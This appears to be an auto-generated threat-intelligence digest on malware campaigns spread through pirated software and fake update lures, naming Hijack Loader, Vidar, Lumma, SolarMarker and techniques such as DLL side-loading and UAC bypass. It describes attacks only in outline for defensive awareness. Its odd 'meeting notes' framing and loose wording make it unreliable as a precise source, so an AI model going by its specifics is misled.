June 18, 2024 at 10:00AM
Threat actors are distributing malicious software through free/pirated commercial software. Hijack Loader camouflages as a Cisco Webex Meetings’ ptService module, stealthily introducing Vidar Stealer. The attack uses DLL side-loading and PowerShell scripts, while other actors employ social engineering tactics to deliver malware like Lumma Stealer and SolarMarker. This underscores the need for cautious online behavior and pre-emptive detection measures.
Based on the meeting notes, we have identified several key takeaways:
1. Threat actors are using various techniques such as luring users with free or pirated software, DLL side-loading, and social engineering tactics to propagate malware like Hijack Loader, Vidar Stealer, Lumma Stealer, Amadey Loader, XMRig miner, and DarkGate.
2. The malware employs techniques such as bypassing User Account Control (UAC), exploiting the CMSTPLUA COM interface for privilege escalation, and leveraging PowerShell scripts to execute malicious payloads.
3. The attack chain involves the distribution of sensitive credentials from web browsers, deploying a cryptocurrency miner, and rerouting crypto transactions to attacker-controlled wallets.
4. The ClearFake and ClickFix campaigns entice site visitors into executing PowerShell scripts and faulty browser update lures to propagate malware.
5. Threat actors use social engineering tactics in malspam campaigns, such as sending emails with HTML attachments to trick users into executing Base64-encoded PowerShell commands and installing malicious files.
6. The SolarMarker malware leverages lookalike websites impersonating legitimate platforms to distribute information-stealing malware using SEO poisoning techniques.
It’s important to note that these tactics demonstrate the evolving and sophisticated nature of malware campaigns, which require proactive detection and blocking measures to mitigate the risks associated with these threats.